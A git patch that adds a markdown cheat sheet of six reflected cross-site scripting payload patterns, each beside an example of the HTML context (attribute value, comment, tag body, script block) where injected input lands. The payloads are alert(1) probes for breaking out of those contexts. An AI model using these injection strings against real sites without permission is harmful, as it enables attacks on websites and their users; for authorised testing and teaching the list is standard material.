From f3b7a38a684f0b89b95036bf3b9a3e95a0b0e2ee Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+MD15@users.noreply.github.com>
Date: Sat, 12 Sep 2020 18:08:09 +0700
Subject: [PATCH] XSS [1]

Create a post about XSS payload and add 6 payloads
---
 XSS.md | 65 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 65 insertions(+)
 create mode 100644 XSS.md

diff --git a/XSS.md b/XSS.md
new file mode 100644
index 0000000..2f8e976
--- /dev/null
+++ b/XSS.md
@@ -0,0 +1,65 @@
+# XSS Payloads 
+1. Basic payload
+```html
+<script>alert(1)</script>
+<svg/onload=alert(1)>
+<img src=x onerror=alert(1)>
+```
+
+2. Add ' or " to escape the payload from value of an HTML tag
+```html
+"><script>alert(1)</script>
+'><script>alert(1)</script> 
+```
+
+* Example source code
+```html
+<input id="keyword" type="text" name="q" value="REFLECTED_HERE">
+```
+
+3. Add --> to escape the payload if input lands in HTML comments.
+```html
+--><script>alert(1)</script>
+```
+
+* Example source code
+```html
+<!-- REFLECTED_HERE --> 
+```
+
+4. Add </tag> when the input inside or between opening/closing tags, tag can be <a>,<title,<script> and any other HTML tags
+```html
+</tag><script>alert(1)</script>
+"></tag><script>alert(1)</script>
+```
+
+* Example source code
+```html
+<a class="item-pagination flex-c-m trans-0-4 active-pagination" href="https://target.com/1?status=REFLECTED_HERE">1</a>
+```
+
+5. Use when input inside an attribute’s value of an HTML tag but > is filtered
+```html
+"onmouseover=alert(1)
+"autofocus onfocus=alert(1)
+```
+
+* Example source code
+```html
+<input id="keyword" type="text" name="q" value="REFLECTED_HERE">
+```
+
+6. Use </script> when input inside <script> tags
+```html
+</script><script>alert(1)</script>
+```
+
+* Example source code
+```html
+<script>
+    var sitekey = "REFLECTED_HERE"
+</script>
+```
+
+
+*Will be updated again!